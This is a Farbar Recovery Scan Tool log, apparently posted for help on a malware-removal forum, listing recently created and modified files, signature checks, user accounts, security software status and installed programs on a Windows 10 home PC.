2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-01-10 17:37 - 2017-02-02 10:10 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-02-02 11:45 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-02 10:26 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-02 10:08 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-02-02 10:08 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
2017-02-01 23:59 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
2017-02-01 23:54 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-01 20:58 - 2017-01-02 16:12 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
2017-01-31 23:03 - 2017-01-02 16:12 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
==================== Files in the root of some directories =======
2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2017-01-23 10:44
==================== End of FRST.txt ============================
Member
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
Ran by Joseph (02-02-2017 12:07:24)
Running from C:\Users\Joseph\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
